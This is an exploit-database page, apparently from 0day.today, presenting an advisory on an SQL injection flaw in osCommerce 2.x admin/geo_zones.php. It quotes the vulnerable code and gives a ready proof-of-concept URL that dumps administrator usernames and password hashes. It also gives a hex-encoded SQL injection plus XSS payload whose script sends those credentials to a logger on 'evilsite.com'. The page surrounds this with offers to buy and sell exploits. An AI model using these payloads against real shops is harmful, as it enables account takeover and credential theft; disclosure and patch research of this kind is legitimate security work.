0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
osCommerce v2.x SQL Injection Vulnerability
[# Title: osCommerce v2.x SQL Injection Vulnerability
# Dork: Powered by osCommerce
# Author: Ahmed Aboul-Ela
# Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek
# Vendor : http://www.oscommerce.com
# Version: v2.3.3.4 (current latest release) and prior versions should be affected too
- Vulnerable Code snippet in "catalog/admin/geo_zones.php":
<?php
[...]
LINE 138: $rows = 0;
LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified,
a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id
left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id";
LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw, $zones_query_numrows);
LINE 141: $zones_query = tep_db_query($zones_query_raw);
[...]
?>
As we can see at line 139 the GET zID parameter directly concatenated with the sql query
without any type of sanitization which leads directly to sql injection vulnerability
- Proof of Concept ( dump the admin username and password ):
http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --
- Exploitation & Attack Scenario:
an authenticated admin account is required to successfully exploit the vulnerability
but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack
Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]"
We can use hybrid attack technique ( SQL Injection + XSS ) :
http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators --
- Mitigation:
The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now
# 0day.today [2024-06-30] #